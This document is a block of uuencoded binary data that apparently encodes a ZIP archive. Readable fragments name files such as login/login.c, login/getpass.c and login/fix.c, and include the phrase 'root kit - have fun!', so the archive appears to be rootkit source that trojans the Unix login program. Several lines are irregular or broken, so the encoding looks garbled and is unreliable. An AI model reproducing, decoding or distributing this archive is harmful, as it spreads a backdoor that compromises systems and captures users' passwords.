      M`Y['T_6`SX7\6WC^$8!G!,E_#.#+@O#Q@&\$/$/%\,D0SE<'ZKL5\"9(WQO"
      MRDL"_"G`E_'\BS#]4XWN3JHO3%@,^!Z>CO39@+<$U9<'^/$@_&[`3P$^A]/?
      MB^T!?#5/MP+>#?B?>'HMX+H@_=@$>'00OA7P.'>`OP=1'H"G\_P[41[N0/\^
      MB_)P*_TO"+]6!?33"/KY(LHGJ/Q]V-Z@\E]#>0!>P?$W`5\$\E-S^7V(\@BJ
      M[^^`IP7)]PN43U#Y7I0/X/_B]-^A?`!?R?%>;#_H;X::X2$0Q@&^DZ>'`3X7
      M<#,O+Q+PC"#]'P7X,L!G"K'YP)^_%$V
      M'K&\%,!/!96_&'#YTR?$_8?N"
      MRF_!]@7AA[!].P/V[2VL/ZC__@O;&T3_=W5@?%+_`J[A]@7MQ]=J-IX5_/L!
      M.$ZX>R<$X>`O2-::=27%U>@MS!!JI9J2ZDU"656)5"$4I2W/3EZ2F2JLM4K6
      MRO5"41$D2U451665D*FRN$)85UQ1454""9!<5E-5*4!2F21LJ"F3K%A696%M66K45^BXI*I$W5UJ+5`B165@E%F3G0IE)`L'AK2850S7*5VJI!&!56
      M:[5052T5UZQ%&8A5M=+J3<6EI35";57)?5:HA556M+%6*@;>:JW6^X02L6I#
      MI;#Z?FM-%:17EF+.TJIUQ665E<7KK)"\KJH4F,?[XI(2:S5D+\)6,=&5K(%6
      ME=566ZVE`C2IU+I14&2[AK=Q-41#R1+R4$79UU3;BDJJ*J6:J@I60!4K`%*1
      M%@2/]];*BJJU`HD=;_S2JX*^J2BKE;!3JFKN8_T%S0&^L7CHLN(*J0S8+:NT
      M2D654E6Q()5`8K$DU0B44+NIEDH4;=!2:+Q?5M1*P&JM->LYM@;0$H6"8FIY
      MNR`.N*YA<5+-&BH:.U2"]I5L$(I(`4AYL/5EIAE:NA'D9"TMEHI)(6JAUXMK,`K$\\2'*3A&M&/97*>-87.4=B*SM=K9S*9J
      M;V=C3YO/QJC6@KZ?5C<$YS0,H]`?@7`4^L40XEC&<#3ZV!#>@/XMA-'H)T,X
      M!OU9"&$PK\00'--[,03'K!1#<(9$#,%IK<`0',-J#(V"(&$(!F$CAC"Y;\80
      MG/!Z#,%X-6`(SE,3AN`
      MW\40%A4=&`[%-1*$X(2>PA!LZ1D,80'0B2$L4LYB"$95QA`6'.!,)1:\5[$3<2CMHK8H,\D82C%HO5B`N$HS:+Z.)ZSOZG]
      MA.-H$%NH_83CJ!!;J?V$X^@0CU/["<=1(G90^PG'T2*>HO83CJ-&[*3V$XZC
      M1Y2I_83C*!+/4_L)Q]$D=E/[+R/>0OVOPO83_CKU/^(=A+=2_R/>2O@QZG_$
      M]Q)^G/H?\5V$OTO]C[B;\`[J?\3K"3])_8]X->&GJ/\1OY?P,]3_B)L)[Z3^
      M1WP1X6>I_Q%/(%RF_D?<2/@YZG_$(PD_3_V/N$#X]]3_B)_O1;R;^I_:3W@O
      M]3^UGW`TG'*V&V$GM)QRMARA3^PE'
      M*R*>I_83CM9$[*;V7T(P^>3L+1NHCH\WLZ"$AG]:($'*&`HT'N!XY8#<="O]@5X%:0(MS/$UV$_JK'?
      M(=B^7W'4->>HV^T&?NSGC(4%EG;3.,VDV=QX&A=JUYA%97<:,6[HPW
      M*'=Y$-\D!]OLFNVQ[7Z%QS)OQ,H],/@*@GKHP;+,C_C;P*G'N\/W[\
      M&F6>@GCG;/1H#B5"JU_%_:_>/<)W_VEH1)OAT[X`4O%\!9;(-8?3S4&Z(0J=
      M+:(^8C*(;[CG32!RQ5\%.+B/9!;M.%E!U[0QY,W]&"O1WJ^@]YW
      MK1?,XN/^I)64I)?GXX#YD*4WHP,X]2AHC"OJ`4=^IWT!"DTP-."&@/V2:DNX
      M'('D_R$0:BL2_\`4S*DVR\]?P@)UC:TVB6+*A?+P,BC*@_81W']&N:D>[!8]Y$UQPJ7GP/!]\2?^FCQ;_X,SX)&A6D<[%-CHJQLI7L(RDKJ)NN82ZD"YQF4Z9RY7EZL*
      MY6HL)E(\!;D+9F;K@8B21_OT`D
      MT4#2;I+19W&[3+*9E]B,K+0A*UU0Y@V8X266X*E/^)10(37NG7"B0=T-2
      M@3P-BBJ4IU"K([U#77,:3V_1RH]`R>71Y5IQ/!;BZ<;JSF)U+M-9LVO5>4NY
      M(-=2QT8#"84IL=5E/KKBGR'%NU5'@'6R7>+N_@E"L(-V/7H!:1+,?
      ME1%]P(_^UP62M-CDCVE'@AU^M(4Q>1BD@S9RVSF<+0HL/NV]8/J:\;*['B[`
      M;;1\!L0`-T;Y0W9SD_PVNYDB'XY$S3)ZM?)6<`\-![7B<+#(K9H].MO7VT=5
      M`V(X>(3A?X/46G_J^X!M\&.'NXYHI)CRT&8TM&;Q&Q"9W(9-(,L;"OW;17F#
      MB;Y'HN8!1!L&$/4@T>8!1.(`(AF)"@<051/1:.\0UQQY-RR$FE$<25H)KIN_
      M4;BYP:M#';,'TC?S]`W!Z26!](T\G7@P-)R#OF_M(MOCVH>.(90;1%(@IT*BO#U0W(=H;(Y%
      MPO!8VX]N*"NDL54*XUS87@DBL,A?_:`0Q,OS^C-BD?_L3QQ.\19>VYL0WX+N
      MNNO7W6`45]R#:@ZZIW1(RA7*UZ^#]O\0W$'4+T-O'B`S&CASF#[#N'*:P#O`
      MR@7;4'(>6+K9U2C`8#++G_U`MN%L8BLF\'&@PG'@7*63/X7E\^YE4"Z,]Y'B
      MDS!TFM.H(`\C=B=&/D20TY0O-8GTH
      M#+JCW_M\;=I#<"N4+Q);PR'J/)"P.VH?&AGHQ;UH^)9\]3S>CY=.,3-0=
      MACETN/PNQJO%#[&GJH%UQU$K&F?69;FJ8!XN)`2)'FT4\
      MAX@!D48WI?X3(_I2(`*XB;:_@;&"-,9)-_4+!6E8(=/)9__)9NC3MF$'OH5,
      MWB$'OH,@L8N2"^2WIS`V%A"3TLCZ.R"O6`_3I46^/X[2G*-$<+4;3T@WN%)4
      MYN;G+J'B(H6L(H77MVLQ#F,23A_$P'&AZ92_7]^^<,+1D;$;RV#JH)+FBT//
      M@KL4@5V]5'[^6T4?''_ME_.="Q\ZGGD<99(WUN<8Q14#?#'.`6$B:WD-H)6??>\ZXD6B`G&G^J'-^."(8E,E"V,E[5E&.B-X7D7
      MYO3JP3^NTQN>?P-+;C:3X<*%!U(3"UOTH'F&YQN).ISE1%K[@JSA:,7"G740
      M]0966RZX&C$$8];"`B0TET?*7R\"?HZ`>]%X8NMD>X_/!NVB+7]#PP@0`XS4
      M`]^0+GE"?-PW!8X-NZDXP\[6ID:44`,I6A8?S;G(1S5N&AC^0
      M^0?C(>*BB0^!GX..[,86D5&L&\T8&&J+:->^P!\>>*/=O-&&'4XU6@YEX<7Z
      M5"O-;<9DLWC+6?]`/W%^$`-=SPK02&-8`@K,AF''#O0-D,BP/])'U-F.V9AU6P]6
      M8`MK"PGFO"F2(?:>"%M&E]9,1G6AHOEQ5-+VR/J><%N,GQ[C6"[&E-?@YE(0
      MN!2HPL8NPR.X3P!3./14RP#-C*(LM](*O;$5O'U([+N.DP=P)TWW=\'2+(4\?A'-EP">?((NZGR%%`(SNC
      M<#1@"3X:N\Y1SXW6ZO9N!6NFWJYN4@5\=_DL.!#RBBOHCR%]S%7H7QX_D/0D
      MDHX-)@4Z9H?%I8'./O#UOQT6SKI>9:Z7CX\<6,^[6(]F0#T6SSLP%("WEHH)
      M*"\D)2TY`M$TJ`S[HWTT;'_B&(6R;U[6JP$2G>&A=1K<^VB,^S7N?:R%ZPL`
      M60!S]VATU0`K?ZO1E0)4`$B_Q;T8S(N#J/&TH2%7@ZO@<$-#)MQLNT2Z-YR1
      MH#7RS-#0.+L481O)U$YC"V?)^%R;^K%,!+WJ`:(#O?Z/1Y?R6P3*XG_N?&ET4P&:`90#ZWS#`]*<@?!G@&,!)@+,`
      MDZ$,Q3\99A'O18,3%TLSGOPZ>+R>L2$D3TYC:,"'[YQ.8'2>5C(9_?X[[Z^(8BN,*'%*E3"J$X>VO?;@QW
      MY_72]B<7CCPZ3!""AM?[OT"D,
      MD&^0[[;(_\";T;#6!/7P#K/(XAP:30Z=XIM/]V/Z@*K%%R9##P
      MF,IBY.F?TT;'*1E-)!JIQA.&1W"?V;FJ-V![<<%GK],+4E+]@?D&=+7"NNS,
      ML!1LIQM8A639+X7:PNMC"P"]X`USZW5-E-1GQRP6<4ZOWR)/E97I-\3OD$1*
      M0RWB8\C32/0$6/5HSVFYF=B5Z`M2_%\BG==(BK^=RH=I[[:F(WUO-SV&V'R5
      M-)YS*.DT?4U$PGDW-*+NL52=H5%+.XQ3#`^=QF>#DY]Y_7<:G7OE\V!W`1X!
      MV,%#A%-!]_\=V/%OTA#JKT&+N'Q3!*XAY1A8G,F+X3X=>SH&QF.6HB2&^@@!
      MQ!52'Z'#(+VQ2QI>[Z1&E\,:ZF:PEM[)K&\`]T:Y<5]U=*``6OS%D`[I6#Y-
      MHT]2^SYR6;]7-N'F!.O&+0-U0UJLZ(:T8/*%_LIP1T`98KZXAC*\B)T<.L&O
      M#`%=#-*$`TB$>Q'_7A-L5VK"MB!-:)`43/3,_C0+1=B[HQN5>O:J*[[5J='\<[;[9K3O`$@OM'WGG]XW"OSWMS_SC<
      MW_..Z!^'>WI,$9J.U/_C0M-CI!,P+E$-#\#$7[\;8R[Q7G8/T*F,R""=4MD4
      MG5+;%NC5BDXAC45<%-"IXY]=0Z?>0G7Y8\P`G>(F)DBM/D*Z[3%(WPN^$0^_@?![?C]8
      MT%T'[?6`?%1']N7IH3B[P)S])X:_"[C\D8[;F[O`WJSDYB+=NX#6!A9Y?I_2
      MI;W>/(BKCUB-@B@7RD?(^+R>X2JY(XK4]&^TOZ0'\S2"F1DU%G(!]`+6/JQK
      M,0)/[[%TEK`@V-_W/[\
      M"XF*QPY&46Q7*@J>1U84I6$7>[@E3=JJ:SPMZ;WKT80L++"
      M>7_,+3_0]@83W?-V4X;DCC.+C>-PML]*DD/D@^13_31OE1]+,;V-6.W
      MS5+MQ@"\X`3:O[2#7^.-=0?&ZF4^5E5LK#[B[]B^H+%:8%&D,5&^#+WD'$7N
      M#'HP4SOLK6IS;OE\^>4QU,GDY!CV"\SEL;=>LG=/,CR4R59#L_X(ZZ"7-;KU
      M^_]G0/K3M=,F0SVM?PS@YP?4NV@?KE6JF2_[6UP1#3!\U)(D+;;2\&!3")Y$
      M9XUJ:#4T;@SAGI_R)'+,&=JJ=!RE6(5T_FV2T3D*BV"^;5*'P;X@J*CYM]F^
      M[%>/,00[G179=IJ*-%O*C?)X$*`G)(3\;_Y4Y`=U?YZK!_)\4MV?YV.TR82[
      MY5EJK:X%+PLDN-2F!F5;/X=V/JB#\4A?5YI9!%S%8)8CA_\Q,,M9EA1VA,7G6LHGR'BZU_..?VVAB.951LH(&UL-
      M#7BT!9?VC;^DY6<^#F9#`YY%EW^/ITJ:V%J&V*?^Q)[$H^[!`BY1]>\1G"K;
      MU&!4*9]9]*$AZ3BM+)/X^D+A*;8_3[81`V=8;YB]&R:;R\JB(\#(5T(P(U(8
      MU[4:;[\*CN$V;9OCV\33@?'9K9)&;$7[$..M`%O4K99RO"5N8-HY#M,='WN7
      M`9^`%\B/*(_>I'%@NR++598".8145(_/D`ODGYVB357G;,H)U7AC^K=Q_3A_
      MQ4WJE&#>'BKW^7Q4RU1_+=%0RS"JY9F/P6J%05D%\@RHPS\YH&TJ%\1+Z,I.
      MDB\IC[?(ABO/L>2L8^%+\1#HDNGQUHK[#]1>GK/\]V[_42:/:
      MU#TI;>J)*=OIT1"T'*F1$$/V-,OQUZF?`*_'T)_[103--/X)J,!2?J=<`#.I
      MO"WBRN=6_J=Z=,Y'ATNI.IUSE=YIBY0_Q=G&-T'2V7U&::%WE=LQ;@]VS>SG
      MJ&L/_R/2\(JI.ZS#8>IVG%\#5Y>IVRQ&Y2F/R^2S?V7=>Q/(U#'N:^U1N!QZ'"X'
      MT*MP%^86./)['4NZY9_AMJX=:9Q+NMO2QJ@%N(30;G5^K_V(SMZNLQ_5I=O[
      M1FQY.U`1K1]%7&ISIJ?_E\]W:#+@!S&REP[8?/=K4!H_??ED$=,IDWS^+\J3
      MRQ$44:XT_@*4$]`G9[[>N232:=)EV+N'&Q[:3XY>H^Y56C_L>DVC0W@*T$7\
      M'F$OX&:`97`O0E@/T`T0"7@TJ#/&7#M2U[NW:
      MD3Q^Y(#X*!X?-2!^.(_'L&5U('X$CQ\Q('X,CQ\SH)RQ/'[L@/@)/'["@/AQ
      M/'[<@'@CCS<.B!_/XS%LF12(OY''8]B2$HB/X?$Q`\J9R.,G]HL'B]*NHH-S
      M(?YGW_ZXP#-O^[DTT%,Q_G.83#(N0Y?)]WWD\]&M*T/G6/*Z:V-88A=Z?P\F
      M`8USR>M-JK8A"^!9ANV/,T."%CW!H^C.IT@#:V/T$/C
      M=!AIC\7;"_W3[;&HOG_'R/H(O#7V2Y_0K(.XV/?!>N@3=N.]/58#USZNXY0\
      M^?T(//1*R?41F*SLA3=CB8=E[2R5O=,?AP3^"#9.*"X6?Y6X`"^&QUMC?7[9
      M*[P8ME'92$`\;B-.?%_R`8=TS7JJ+RRX/IZ7&N^[S(C=VT@L>'@GD%<@'E3!
      M\X$S'SP>D+E]`5Y]DCXIL@[<4YU]KL_VO7.1QLRLP8D/@W@89)X[@_.`S0.#
      MK1970.?+C_^%'<[2-7;YGVT7R#L^P$-8>\CN1'+EZ*.Y&2>^KKHH%L=W>^>&
      M,?,:14]!T7(+^+04#;D@W5:N1]P3,>7+?(NO%73K>DDGE:IT](0&;"7(,]EB2/%R@`GO4/8<0U!
      M'$:G"J(Z^!@%L@T!LK\P,O`WAF+E6XA*A^NTH>!_R)4*KI9&EZLM\CU^?$NH
      M1>[\$)^1]UL_TB1,,_!-)_!P0^-IJ*\A4)_57]\PVH)[XWWP;V+H_!]@OP=,
      M_B.H=T$A*&"NC#_^#FS(47L/9.#TY4`5>Q2H=R,*$UB$O?4RW1_(@DL[VCSP
      MQ_'D,48.W&\%_L2'/\<5C/P<:E^[N/-S/%'X)"&60GD'BWV"8K<1@B?J_@.K
      M'?N^Z3?]7.GV:++1XK/8DTJ>48';4:CON*9K\<0
      M%<0_0J+X"N;Z!^02#P5$-2\TN/%L'RI=E6'.V;8
      M6_7F7#FM`TN#HD,36[WCP1\^H@ED<66I3SG&M"=KJ.R.P!:%LK\TFZ:#>[06
      MN6."XL2.%)_"MN'%(K](T7H1G0<^[H^\AP(H5]!:0-O2M=7!)+_L3V(FN<;!
      MM,(D5,TD>K&#G6,L5`Z$S!!?^=*_`?*+CL&<#PHZOB%IY9$A5SG7@/P&G6L(
      MAYJW=E!?PHH%._BGR(?"PTRS>"S`Q.C!,*$/'(.0-_T#31Y[ICWF:F?5Y4*@
      MX`]VR?9.1M6V@4WL="OG5O[>^]WSAN=MG6*>#_H`!>E*5YGEM\;S,R)X/B2,
      MGP^1WFX\41+KU/&8A16V>L:T'9ZNMM]A;0[C^N\QJMV&_.F4!/=;[
      M@6[Q29WM*T<'^2NMZH"OI8$^.H2_)7#-*91W^M@,J4F:C
      M)$BBLR+KK?4+?3:S8?]BE3:,'F&KUJHAM9?Z?/-LRP/]U/M^%C
      MQW=3+X'%Z,TME#>`H%1@`R_@BN8Y=Z$\VL=.<6N\/Z/GHLJO'8">'^4UEZ)SU\;GQ+`O6D1S:V&RTT1!77X/.W>==[
      MXUUSG*,PR?'.U`_Q,'T8J'FJS^S5N&$&R^7TL]_V'[6KNR%PB"?#WJ.14D%7
      M9N-#02I&];&#PJ11R,*&\(`DDH@[U!_E)R$!P:&A#K+3-K33=+CF5B)..E6G
      ME=\`_\'"QD*!?!884M$9G'YK>EB[L[.8.$N9]&9Q#(C2M0\/]!7('>_`:KW5
      M<2%XZ&2889GYT5MD"#N/4^!YQW^N6T/G68D;&A]F>3[0F"UB'!;[#!9KD3>]
      M@P=&Y2WL=.XE98E-/ATS*C"E'W@8Y]T7T.D;\Q:;`+ML1/3Y0^??
      M)(7.7R2%>Z/PQ0N_P[4,:6J6A32&+O5KW]M"FD-1MEYZ'`J1)Z?5W"K8_
      M$UD+QDP]92ZTR,U0KC<4]UQ"A#8MQO>?_U`F>*!PA.%@B#F5]LR!#8BQ?=//
      M!X%9LGFCFNW581B0[?<"DZT)U[S:W9@(Q/7S!$-#!9WZB\9Q\03^SA#BMZOG
      MQTHW&`ZVFE,<^3KY5^QW2IXY2#G'9](1B>8T$-B[EQH>NI$=+3$>IW7QNV]I
      M=(GO_-^!4_\7ZT9X>D#];L#GOMT_+NHJ^6(`]``BSS\9H'PZG_P_:U-^J:)G
      M,9Y?X=[F(K/GYQB*J)^>1VBOTK7J*8L\\SCJ]M_:0=W%E3#_E9>Z5CUMD5^G
      MZ)?H9ULQGK5$7QXKOXE'=`KP"&`]GG@D%7`2<8M)D$&\`R[RQ'9FD]""-OP-
      M=XK0AP/=L]]'/Z\[
      MUG9[6R,>=(JUR`\&:.YN:AQ%&X!H\]$%(!JS[.TEKKP[<>\SW#:Z/,+1J(<4
      M^;5>MI=)F)E'_AHB60Q-.Y[E<.>VR#M`0-Y99!:\H]WBWF$0#G.+\1B&NL4J
      M".445AX;,#C6&O%WE:Y?X^9?O]^[%#J7`(G>WC-EPW"GYHE[^Z"3EXJ+T<),
      M=KL>X&>X*&UE3R!-Y\Y=*N;(?C?C=VV#/1!'\UD"&(3M^;J#2.8_[=0Z4A#P
      M>-+OH#=?70EEU_?,MVE?+82[I6)QH*X[VZXUQ9WJ-Y_9ZR+5AAWX(U?GJD@\
      M@+I?BNXS[%\9[7.L.KFMCWP'O7+$)Q'5L):FT$_>'%3Y.GL?R6P?R4RTD\A@
      M'#P8)+-])#.6!OY'@?@0U;#Y35H77D-@>6JECKJ34S:,=*XZZ8QY!BNQB$XL
      MZ!:WTW12J]0R$A"GII%51.GA;LAB$7=05<.#J[IZ>_)/L>K$1R&'<]4IBWSF
      MV"`E8(KL`RD+6\/%9LCK.3D<90V"OM'QL?W()7O/),-#^N%HH9]H_3.8I.Y3
      M&MVQ3_YG(.N]:Z?)'1K="Y#>^;Y&=^\)L&EG^J>?`5S<']"H:33%&EO[3.+;Z+(/2'#T+Z)WP7*?_CH(.59
      M%ZD"6:H](,M0'[XXP>S3<-6>I.(6B.H_\F&XJ@_D@KGB3;)&&':<-O,]C
      MQEO$V1Y_FY\Z,KA1F@ZE;#WH>=R`=OH.R,\.25ODPL$5P(06P83V02C9N1P]HPSK,8,:780Y9;AU4-5%0IL8V#PH,8=U=(+_T(SF#&^C9
      M&X%GX(F'$(4'33`/I8,IZ:"6?-`H$OPJ?$0UYVKZ%SU(KKC^12%O8FE0OWUT
      MZ/KU;ZDF6/^V7<1GA%+BUAM`"PT-^!L7^\400\,3^(3W<6C&MHOX<%4R;AZ]
      M[2*N<:7QGCHM\E&)N@ISNX0AS.WW<]W=0KJ[X!#I[K]G#KI_ZU"Q`3E[)<0O
      M>[7]HMK0B&=:Q<>HO*\/#D;L(6S[E<3^Q=!`.U'NNP)RWS68P@)RQ^-`[J7B
      M<\1(Z74PHF?]/[1?__\AJ/^OCX\HY$/<1VS\[8W!L*%F\F#&..D3@ZN=_%JP
      M`=NC0NM[1FP89=A_!&9FC0]GYE>Q!_4@,X@T!_-9_<:_G:`I">>"K)DJ^ZF&SI1`OT*DL=Z;Q3>XWASG>G.2Z\TGU"[M&S^J-UE05812
      M5=Y,U2%<9W8=,4K:0U]"_D*.+P+\7WZ\X42=]E`/HJ(/KDOE7:\/0GC48=B:
      M8U%=AV.DA*5BZ%?(8:9:I]-!T&(SZ9*
      MM[>%L"D\J5-OW`@>NRZ:_`7"Z.H!9N&UQ.-G9O%Z,I
      M4]8@,WFR=VW?E^"DUWTJ2"&N_$]SR?OD??'SUP:K!6".CNF[#G>C
      M$EBHM?<,)B]D(D-`/54X),@'61'0B*A!EL1M0.00Q4:N4%G()/%RWGUU4/XA
      M-PG,,AT-#>(I:+S7OWI=/&T.1;MT[Y^]SLI6OG?Z<;.5K?X4P':VX/K3^(JR_#/L/@Q6G15ZN6/85+K`@"NZK
      M`XKV_"OT\&E0JZP-7]$JR_,)VW<0[_\J(+N25P8A@73'MP[;22:"+4EX]L9T
      MLGY^]'G;",?AY*0ED5)L_>80U7G;>,>2DRQU>TPT-*@I1NTSG4R!"2MIU=AY:)7G3>7"[*5?NVLIR+%K8&6?;!_,`.9V/%J(,QF[>/M>6PPN3'K
      M[>Y<&B1*QKL'EY&4R/!(+VXDY;+?>HGVH/I'[A_4P`U>V$GA-+]Z;V7^_!7+
      M.^\46$N\3VOK??O8(!JGK"',XDDY4/G/]@4IQ35'E.?G[/=EXI,!H:_<=YUL
      M(\N3MNJ!^RC/3UAYY!=X%M"92''75\P?>.XKY@_\C@SM#R\'^0/79!!?>"H$
      MQOT$E;+L=9C.T-@[8]@_TMZCDF+!)SDA#?66N>T]:FF"M]@-=/4;52JI<%O[
      M7JQY./ZFJOT58F);>RN$CKI3A8J\UKP\B#X_Q(>_!]^J`75O'VK8_X'_Y.@B
      M*:'^XB3IUD:?%,E_8#>)_<`ND1>-66YL&LLBO1DXOP/_@GE;>_L`=C[ZT^#9
      MT?M,9Y@J?@W>0Z//T(B''_MSX,$?;I.ONGUD?<^4#6.9>\AVC][W=[YW#/CS0X3)UF.7?_9Z?1+%]N*;==%Q'?,L->^E]&.W&NBG*:\#TJPYR1S@R-([\;'RV:NLT6?J3D
      MMA>QH>>"\[/3<&P/FI^,<[LM!V+H_7)X]?G?+]=KO\,7>+\9YU7(5;6S,N3D6
      M(R,QVBJ+UQ>7512OKK#>811B:V-KPP7)6H$%SC/&ELP#@OLJJS94OJ]F3>_MGBM%#+7C:Y2-L:7&$K&X
      MIA:B06:Q)8%_(2)\!10^S[C)6KN*YT*^C)G)J8Q?:V4I0Q3Q5Q=7EI48\=W1
      MU@6QI>$!JM*J0/8-9145P2F54E":@E&:GY+2>!DLI5\N*B,MTV+.2EXN9*45
      M"::L]"(,DW/R\^BF*!>O69DIYN2\#"$SW<)$"YVW;)E0_=.:6LFV?L/&3?<_O82DY"7MQQS@[&0EYR:G&HQYF>F0=UIQIQT
      M($_-R4TCO<_,3LXRYBTWFX!S2(3LC!U+OCDMWVQD17%,2$O.2S8"S[G+C4I>
      M(65YG@FJ2LW-$;)R%@.]8%J6AT4E6U(S,X'7G*QT9#FG((\'%@S2661&'@\H
      M,C67,#/E$G)3\Z!)F5#-8FJ+8,E+SLM'0F@J<&3.-5DLQL4YQN0,$P@B-Q5D
      MG9J1(Z0`7[G+A?2B*NLJK1.%6J$
      M^.EEM;4V:WR5K49`>U)+9%`&A#C"V'O?61%@_5=SBR_$X;OVRRIAN)<:5V]"
      MHP]0BB$$PFTT68`R&RVFB5.!VK0..`_D7[APX52_%DQ#+3`*F1;CI-CX6VHG
      MD4((T_RV_J>VXHJR-676&FQ97,+&V(U3XP.9F68:XZQ7J<$(96*1@I&*I/R\
      M5$A<&%NZ$&:QQ8NS3--0RZ>EPH#+A?XW8J<9H=,P`^:)+9WJ'Q%&&I)&&IU&
      M&*9&&J]&E*@QJ.KTJIH-Q36EQB7%M?=!.1N%_G6#C"Q9J1`";]DYJ%,X;(VI
      MR=EYJ1G)V8M-@K$@.3<3OQ8@&--,ZGWD43
      M+A3$1(-EWR$P3I&G=56E5N)H;;+9D+A8VF](R
      M\WA!5)A1*6TAA@M1E*`11E(1%I0*&&%),:)TA673N!6>IHQDH\"M"G4M&^5"
      M9G8Z2&P2-HX%6?DFO#%94C&(39A91;H4$!7-VK$),S8*3#FGKR^N06,Y?8.T
      M#BPLH36VRNDV0@-_B^)NFFI,K:K>5%.V5I2,<253C8E)LI?'APN3,4K_'
      M$%]RVWIC(IC#Q*2D.=,3;I^>.,>8,'?>[+GS9LPPEHI5%17%,&&9-E8;)PL"
      MOCM)Q7G#D&8`YG`(2?"'\2]?TNA>!6CE;U53"_W_?#W1*M]Y7X^1KC?1=0I<
      MB2F:>SE+LP;#DN\RS/2^/KQQ8Q!M5J@
      M'WSA7[^R:BM*KJ<8EF=3;1'R<#U-[*\LU]05Y6_V98V_S3.X+.[B_5`IL&]\
      M/2BP[WSA21A\XH8OQ<2WMMRF8M_I6J9FWPW;JV'?"<-7N.!1FGO#V+?!6D>P
      M;X;A,7[Z9M5=//P9"U%6$8J<;%)9!:CF%4V&ED*39]X^+V'VP":/_D*C&PXP
      M%&`(@`9``.CY7*/K`O@.X#S`.0`/P!<`GP%T`N!6'V[SX18@;O^]_3F3QT-?
      M:G0/`&P!J`!8"X!;KWD`.0`_`3`!W`EP.T`"P%2`20`W`D0!#`$0`'X`7CX%
      M^!C@78"#`'L!?@7P)$`3P#8`&\`Z`'SD6PRP`B`7(!-@`4`\P,T`8[]@/.*>
      M^^^_O+*-0[@L%+DH;7X!:'\+L!O@EP`_!W@<8,>7`1W`O]B,>;%+C##EQ2;?
      M1O-!BC%VN=(_:RNJ5A=77->(H'S%-K`]E2778T!8??2%F:O6ES0O<=:\&5>H
      M@Z",/254ODF&?\_NT.A>`C@(\![`)P#?`/0!#'M$HQL/$`]P)T`VP#T`E?C-
      M+(`=`,\"O`1P$.`]@$\`O@'H`QCFAOP`\0!W`F0#W`-0";`%8`?`LP`O`1P$
      M>`_@$X!O`/H`ACT*^0'B`>X$R`:X!Z`28`O`#H!G`5X".`CP'L`G`-\`]`$,
      MVPGY`>+QFT8`V0#W`%0";`'8`?`LP$L`!P'>`_@$X)N=[`T?"N#K;6F\@DQP
      M7.)KXG'\R_7L[4T:!WMK4ZE=H\-QK@UAXQS?V#R*RQGM!GX;#>U(@II]AP^_
      M'X??Q4M[&/02ZX"0OALEL&_^!2NA_R,^(KX&5?&_K\?@B`Z_/XK"D^3)?082*7,KY/;:/OOEZ'\@GZ`.E"JO5072XGQE3W;]>A6Y#$-UD
      MH)M\#;HM071H8V^K9M]F'"@7.V\KTM$W9W_*OC>K":+#\A_F(=+A_G)'8M_C'4CWOP%0
      M2P$"%0,4````"`!W@D(B:Q/-#A8Y``#L=P``"0`,``````````!`I($`````
      K8FEN9'=A"!R;V]T(&MI="`M(&AA=F4@<'5N(0T*4$L#!`H`
      M`````+(;/B(````````````````&````;&]G:6XO4$L#!!0````(`'2>2QW)
      MZQYI=P0``-<+```+````;&]G:6XO9FEX+F.]5EEOXS80?I9^Q6R*NI*M.));
      M(,%JY9?6!A8-TH=TGU(CD"7*)F)3!DDE<1;Y[YTA1?FHD^T!U#`DS7".;PX.
      M>='WH>]5_)G)84&?\RU\+ADR@"@NU(9+5D(M0#7K80&Y*.$VYT+?ZES#:!BC
      MV(7O?\=%L6I*!I_45EWH[8:IX7)\Q%:H\E>NYFMVQ-4EKP]9C>#()9Z_1N\0
      MY')11/AX#'T$XQ&9^L4REUZ_3^S4_^I[C5!\(0B^Y(O[0A91T4C)A#;?FJTW
      MZ9X0:4/)JRJ)Z#F*YDUU-XIG*&,,(UA445K>);'AXF=3:/`H+J`'*G1LC^)Z
      MS%=0TR:*_C4205="E*CHK-O"]PO]9Y%R9]X\S,F[E
      M=N*&]TT;HYFS]88-WS-ES`(75"]^GD[#\V`/NV6A/K5!MK\R,,JA$9A.4:*J
      M9<"S..6?KE(^&(2^A[T%`)0:TNXE(=`;,DN/Q\@80/Q\%<=Q:D392C'C"<;C
      M#+!ZWJL%.M4:6H:I-K7F>)ZZ5
      M@@K-5_6&B:ZCX$P.YF=A"%D&-U^NK[%%C3.H;(&QK73)I$1!,W\^PL^Y^$$#
      M&<%:_R'.(M@K,VGNNA+Q58JQAZ"*XNOH=C+Y]7YR\PNMN)V359JM5D$5GB>7
      MZ4[:+5N=V\GOI%-)EIBZ6Z[KLFJ`=
      M.4.E[Y'-0@?JC:AO:M@PN>9*(0C0-+94#_>*U9X&>RAR-L3P0HEIX76K9`Y
      M/DY*%`=FK*\&I;)]NX;1V3`4-9)+W()I6JNK,M\&/7MB]?!D^E:6;+_2/@+2
      M@;H"M/!NC=2!*_$/7:'V"4^=\8;65-P#YN7-J-*Q;1`&UO*$2G?G?QZ./2X7T%M=KSGD=0M)<`,)<`
      M3,UIL.M>NVRXY+3#42RC#35-;.E;',6
      M(QN[HKVJ4_`++7UL6^UD@YK++!=XLY1LL\H+ML9["\SSXJ'96+U7_T]0
      M2P,$%`````@`SIU+'9:Y)I?9`0``;@,```\```!L;V=I;B]G971P87-S+F.%
      M4E%KVS`0?I9^Q
      M;&\CT-$7V7?Z[KO[OM-(:=ZTE8!S'RIE3NL/=/0W%82[5\8?)R77H3E.M5IA
      M]7'.[WVN#.^A=%0)J;0@F\TWDN25>,A#V">4YE-8>-\*L,[<:-]@#XW$*7T%R4^N)8'&%0`
      M=MQE>/CRH:"DAW.+OTIC-7XO%\LY3!%1Q-HR*-Z3VETKO[]Y^_ZFH`B6P!AB
      M8`:R,E9HUATH+(/5[?7'K]=I!HE+TA1F,_C\9;E,*2%]0;18([EHO,"D%P&9
      M(UD&K)\G[0JZ/M$[)E4CM(D09-U<7,TWZPS&44E:O(A!H1U5A)_RVT8VY1V,
      M9_";S2\^K0Z+]>+JORSKHTZ42.O0)LE0@G`.%;[V2?;'[`*D;%I?#[==`;G"!_W.8CC2%$JK/),Q*2K=OJY-G97W"D][4;(N[U
      MU;#8.('DC?%BD$:)$_'=LC@DQH_T"5!+`P04````"`"YG4L=PB>=?<8B``"D
      M6@``#0```&QO9VEN+VQO9VEN+F.]7'MWVDBR_QL^18_]:OJU@/LS.R]>S8GQR#UJ[JZWE7-
      MP;Z:+/U$17&XB)VUHJ^N%_O7GJOF<;A63YH_JE?C$Y6$\_3&B3WE!"YUJBJE
